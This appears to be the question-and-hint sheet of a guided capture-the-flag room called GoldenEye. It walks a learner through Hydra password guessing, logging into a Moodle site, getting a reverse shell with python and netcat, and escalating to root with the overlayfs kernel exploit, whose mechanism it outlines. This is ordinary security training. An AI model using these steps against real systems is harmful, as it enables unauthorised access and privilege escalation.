GoldenEye

Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable? 

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?

Inspect port 55007, what service is configured to use this port?

Login using that service and the credentials you found earlier.

What can you find on this service?

What user can break Boris' codes?

Using the users you found on this service, find other users passwords

Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

If you remembered in some of the emails you discovered, there is the severnaya-station.com website. To get this working, you need up update your DNS records to reveal it.

If you're on Linux edit your "/etc/hosts" file and add:

<machines ip> severnaya-station.com

If you're on Windows do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file

Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir

Try using the credentials you found earlier. Which user can you login as?

Have a poke around the site. What other user can you find?

What was this users password?

Use this users credentials to go through all the services you have found to reveal more emails.

What is the next user you can find from doak?

What is this users password?

Take a look at their files on the moodle (severnaya-station.com)

Download the attachments and see if there are any hidden messages inside them?

Using the information you found in the last task, login with the newly found user.

As this user has more site privileges, you are able to edit the moodles settings. From here get a reverse shell using python and netcat.

Take a look into Aspell, the spell checker plugin.

Download the linuxprivchecker to enumerate installed development tools.

To get the file onto the machine, you will need to wget your local machine as the VM will not be able to wget files on the internet. Follow the steps to get a file onto your VM:

• Download the linuxprivchecker file locally
• Navigate to the file on your file system
• Do: python -m SimpleHTTPServer 1337 (leave this running)
• On the VM you can now do: wget <your IP>/<file>.py

OR

Enumerate the machine manually.

Whats the kernel version?

This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:

• Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
• Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
• Overlayfs mount would only be visible within user namespace, so let namespace process change CWD to overlayfs, thus making the overlayfs also visible outside the namespace via the proc filesystem.
• Make su on overlayfs world writable without changing the owner
• Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
• Execute the modified su binary

You can download the exploit from here: https://www.exploit-db.com/exploits/37292

Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key!

What development tools are installed on the machine?

What is the root flag?